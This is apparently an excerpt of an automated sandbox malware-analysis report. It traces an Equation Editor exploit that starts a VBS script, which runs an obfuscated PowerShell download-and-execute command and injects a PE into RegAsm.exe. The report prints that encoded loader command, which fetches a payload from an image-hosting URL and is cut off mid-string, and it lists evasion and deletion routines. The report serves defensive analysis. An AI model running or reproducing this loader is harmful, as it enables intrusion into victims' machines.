                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040F7A7 Sleep,ExitProcess,15_2_0040F7A7
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-304
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_0041A748
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 360Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1537Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2034Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7752Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 499Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 9250Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1292Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exe TID: 3340Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3456Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3540Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3572Thread sleep count: 2034 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3588Thread sleep count: 7752 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632Thread sleep time: -1800000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3820Thread sleep count: 74 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3820Thread sleep time: -37000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824Thread sleep count: 499 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824Thread sleep time: -1497000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3884Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824Thread sleep count: 9250 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3824Thread sleep time: -27750000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407C97
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_15-49223
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,15_2_0041CB50
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C059D mov edx, dword ptr fs:[00000030h]2_2_035C059D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004432B5 mov eax, dword ptr fs:[00000030h]15_2_004432B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00412077 GetProcessHeap,HeapFree,15_2_00412077
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00434B47 SetUnhandledExceptionFilter,15_2_00434B47
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004349F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_0043BB22
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00434FDC

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeDomain query: paste.ee
                      Yara detected Powershell download and execute
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Bypasses PowerShell execution policy
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg
                      Injects a PE file into a foreign processes
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 459000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 471000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 477000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 478000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 479000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 47E000Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 7EFDE008Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe15_2_004120F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00419627 mouse_event,15_2_00419627
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 